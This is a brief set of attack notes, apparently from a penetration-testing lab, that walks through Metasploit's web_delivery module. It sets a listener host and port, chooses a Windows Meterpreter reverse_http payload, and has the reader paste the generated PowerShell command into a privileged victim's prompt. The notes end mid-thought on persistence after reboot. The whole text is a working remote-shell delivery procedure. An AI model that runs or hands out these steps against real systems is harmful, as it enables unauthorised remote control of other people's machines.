msfconsole
use exploit/multi/script/web_delivery
show targets
set target 2
set LHOST 10.10.75.198
set srvport 8082
set payload windows/meterpreter/reverse_http
run -j
Copy powershell command to a the victim in a powershell prompt. Make sure its from a privileged user.
We can run the following to keep persistance after reboot